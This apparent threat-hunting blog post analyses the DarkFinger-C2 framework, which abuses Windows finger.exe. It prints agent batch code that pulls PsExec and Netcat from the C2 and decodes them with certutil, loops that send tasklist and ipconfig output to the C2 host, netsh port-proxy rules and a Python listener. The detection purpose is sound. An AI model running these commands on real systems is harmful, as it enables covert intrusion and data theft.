Understanding & Detecting C2 Frameworks — DarkFinger-C2

DarkFinger-C2

FINGER.EXE

“finger.exe”
finger root@172.22.207.194
“finger.exe” result
#[Server Portion]
import socket
s = socket.socket()
s.bind(("192.168.242.131", 79))
s.listen(5)
conn, addr = s.accept()
data = conn.recv(4096).decode()
print(data)

#[Client Side]
finger random_data@192.168.242.131
Example code

DarkFinger-C2.py

“DarkFinger-C2.py” Help
“DarkFinger-C2.py” Source
if __name__ == "__main__":
parser = argparse.ArgumentParser()
main(parse_args())

main(args)

main

create_base64_files()

“create_base64_files”
PsExec.exe
Ncat.exe
downloads_dir = "Darkfinger_Downloads"
path=os.getcwd()
if not os.path.exists(path+"\\"+downloads_dir):
os.makedirs(downloads_dir)
certutil.exe -encode "path\\x" "path\\downloads_dir\\x[:2].lower().txt"
  • path = Current working directory
  • downloads_dir = “Darkfinger_Downloads”
  • x = Name of the tool from the config file
certutil.exe -encode "[DarkFinger-C2 Path]\\PsExec.exe" "[DarkFinger-C2 Path]\\Darkfinger_Downloads\\ps.txt"
-----BEGIN CERTIFICATE-----
TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAGAEAAA4fug4AtAnNIbgBTM0hVGhpcyBwcm9ncmFtIGNhbm5v
dCBiZSBydW4gaW4gRE9TIG1vZGUuDQ0KJAAAAAAAAAA7paLxf8TMon/EzKJ/xMyi
y1g9onXEzKLLWD+i78TMostYPqJmxMyiLazIo2zEzKItrM+jbMTMoi2syaNYxMyi
drxfonDEzKJ/xM2ip8TMotqtyaN9xMyi2q3Io3jEzKLarTOifsTMon/EW6J+xMyi
2q3Oo37EzKJSaWNof8TMogAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFBFAABMAQUA
.......
.......
.......
/fy7QawdfM0iwuYSrNGykJIfFwESDbhJlpfBENmhOHX4eurV4nCSghnI4+t58/DN
t2ew7XM1xXCEsU797aU7ZGiuW2gOWtZP005G3eMhA8zcrCTDbcRNCxbxrAvBiMCu
2GaQCw7/3QoEz64fjG0TMpIdOZ5EcsdnvAEWtkGPvBmPhex7iBuAbRzeC3xxF3MR
dxRaConyGOo9zVQdINyl40XeuojtUY4frdTKoRBiN4vzNySpvH65uDrcUbWCQRng
C+TsH2nwowysuRYThcCOXYjXlgAAAAAA
-----END CERTIFICATE-----
“remove_cert_info”

fileppe_fingaz()

  • If the data sent by the agent is surrounded with a “!” then this means that a port change request was made.
  • If the data sent by the agent start with a “.” this indicates that the agent wants to exfiltrate data from the infected machine.
  • If the data start with with “ps” or “nc” this indicates the agent wants to downloads “PsExec” or “Netcat” respectively. (Note that by default these are the only tools supported).
finga_that_box
Global variables

DarkFinger-C2-Agent.bat

Agent Source
CD \Users\%username%\Desktop
net session >nul 2>&1
IF %errorLevel% == 0 (
ECHO [+] Got Admin privileges!.
SET /a Admin = 0
GOTO Init
) ELSE (
ECHO [!] Agent running as non-admin, if you can escalate privs re-run the agent!.
SET /a Admin = 1
SET DARK_PORT=79
GOTO CheckOutbound79
)
cmd /c powershell "$c=New-Object System.Net.Sockets.TCPClient;try{$c.Connect('%DARK_IP%','%DARK_PORT%')}catch{};if(-Not $c.Connected){echo `n'[-] Port 79 unreachable :('}else{$c.Close();echo `n'[-] Port 79 reachable :)'}"
  • DARK_IP = C2 IP
  • DARK_PORT = 79
for /f "tokens=1-2 delims=:" %%a in ('ipconfig^|find "IPv4"') do IF NOT DEFINED LOCAL_IP set LOCAL_IP=%%bSET LOCAL_IP=%LOCAL_IP: =%
Process creation event “cmd.exe”
Process creation event for “ipconfig” & “find”
REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F  >nul 2>&1
cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%LOCAL_FINGER_PORT% connectaddress=%DARK_IP% connectport=%DARK_PORT%cmd /c netsh interface portproxy add v4tov4 listenaddress=%LOCAL_IP% listenport=%DARK_PORT% connectaddress=%LOCAL_IP% connectport=%LOCAL_FINGER_PORT%
  • LOCAL_IP = Is the local IP of the host
  • LOCAL_FINGER_PORT = 79
  • DARK_PORT = The port that the C2 is listening on
  • DARK_IP = C2 IP
  • LOCAL_IP = 10.10.10.10
  • LOCAL_FINGER_PORT = 79
  • DARK_PORT = 443
  • DARK_IP = 10.10.10.200
# Anything coming from the C2
10.10.10.10:443 ------[Proxy]------> 10.10.10.10:79
# Anything sent from the client to the C2
10.10.10.10:79 ------[Proxy]------> 10.10.10.200:443
Command Options

PsExec64 / Nc64

#Download PsExec
finger ps%DELAY%@%IP2USE% > tmp.txt
#Download Netcat
finger nc%DELAY%@%IP2USE% > tmp.txt
# %Tool% can be either "PS" or "NC"
cmd /c more +2 tmp.txt > %Tool%.txt
# %CD% == Current Directory
cmd /c del %CD%\tmp.txt
certutil -decode %CD%\%Tool%.txt %CD%\%Tool%.EXE 1> nulcmd /c del %CD%\%Tool%.txt

ExfilTasklist / ExfilIPConfig

  • tasklist
  • ipconfig
cmd /c for /f "tokens=1" %%i in ('tasklist') do finger ."%%i"@%USE_IP%
“finger” Exfiltration
cmd /c for /f "tokens=*" %%a in ('ipconfig /all') do  finger ".%%a"@%USE_IP%

RemNetShPortProxy / DelProxyNClose

REG DELETE HKLM\SYSTEM\CurrentControlSet\Services\PortProxy\v4tov4 /F >nul 2>&1

ChgC2ServerPort

finger !%TMP_PORT%!@%LOCAL_IP%

ShowPortProxy

netsh interface portproxy show all

--

--

--

I write about #ThreatHunting #WindowsInternals #Malware #DFIR and occasionally #Python.

Love podcasts or audiobooks? Learn on the go with our new app.

Recommended from Medium

Getting Help From Internet While Coding: Part II

Introduction To GIT

Security at the speed of modern development

My Test Automation Journey

Working with Apache Avro files

StuffIt Deluxe 16.0

Values and Code of Honor @ 42 Wolfsburg/Berlin

Just a thought copied from somewhere

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store